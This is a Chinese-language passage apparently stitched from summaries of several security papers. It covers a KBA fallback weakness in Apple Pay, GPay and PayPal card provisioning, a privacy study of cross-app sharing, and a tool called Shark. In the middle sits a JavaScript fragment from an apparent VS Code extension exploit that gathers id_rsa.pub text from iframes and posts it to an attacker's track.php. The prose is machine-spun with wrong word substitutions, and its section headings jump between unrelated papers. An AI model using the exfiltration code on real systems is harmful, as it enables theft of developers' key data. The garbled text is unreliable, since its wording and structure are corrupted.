上述过程漏洞在于,在认证步骤,即使接纳MFA认证,攻击者可以拨打银行的自动热线,热线会要求提供与受害者卡片相关的KBA信息,如出生日期和社会安全号码的最后四位数字,等同于回退到KBA认证,而这些可以在公共数据库查到。最根本还是KBA用起来很方便。
这里作者用了Bank of America(Visa card) 以及Chase bank (Master card)两张卡举行实验,钱包应用包罗Android平台的PayPal、GPay以及IOS的Apple Pay。发现PayPal和GPay仅利用账单地点举行KBA(下图a),而Apple Pay则针对每张卡利用两组不同的MFA方法(下图b,c)。对于Bank of America(Visa card),Apple Pay提供三种MFA选项:短信OTP、电子邮件OTP和通过自动电话举行验证(下图b)。然而,对于Chase bank (Master card),它仅利用短信OTP作为MFA(下图c)。
// In this handler we receive a message from one of the iframes.
// The message should contain an id_rsa.pub file text. We send it to
// our track.php script to save.
window.addEventListener('message', (event) => {
const formData = new FormData();
formData.append('data', event.data);
fetch('/track.php', {
body: formData,
method: 'post'
});
}, false);
</script>
</body>
复制代码
3.1.3.建议
由于VS Code扩展在此中利用第三方库,因此开发职员应该通过安装最安全和最流行的依赖项来重用社区知识,而不是本身造轮子。例如,“Open In Default Browser”扩展可以利用npm的send包来防止路径遍历漏洞,而不是实现自定义静态服务器。
3.2.VSCode插件漏洞Threat Model
User Study:为了进一步相识平凡用户在实际利用中对跨应用分享的体验、见解,作者举行了一个综合性用户研究,参与者共计300人。研究表明,只管跨应用分析在移动用户中被频仍利用,但大多数用户非常重视他们的私密数据,如在线身份和共享内容,尤其是他们的社交关系。此外,作者观察到,当用户明确到实际的隐私影响(例如社交关系的袒露以及生疏人访问的个人资料)后,他们对利用Cracs功能的意愿显着下降。 App分析:作者分析了来自美国和中国应用市场的300款热门应用(各150款),发现186款具有跨站分享功能的应用中,有74款存在隐私泄露模式,涵盖短视频社交、购物、消息和康健等多个类别。中国热门应用的隐私泄露比例显着高于美国(分别为55.83%和10.60%)。作者还发现两个广泛利用的第三方库在积极收集用户分享数据,且这些隐私泄露举动每每难以被用户察觉。此外,手动检查的iOS版本表现,至少58/71(81.69%)款应用也存在类似的隐私泄露问题。
4.2.隐私威胁
1.Static Information Extraction:静态分析提取运行时触发共享活动所需的关键信息。具体而言,Shark解析反编译的应用代码和UI资源文件,以定位共享按钮及其对应的活动(即触发共享功能的用户界面)。接着,Shark构建活动转换图,包罗一组可行的路径,以触发和完成源应用与目的应用之间的共享活动。此外,Shark还接纳反向数据流分析,跟踪与共享内容相关的变量,从而正确建立源应用的共享按钮与目的应用之间的接洽(例如,哪个按钮指向微信,哪个按钮指向Facebook)。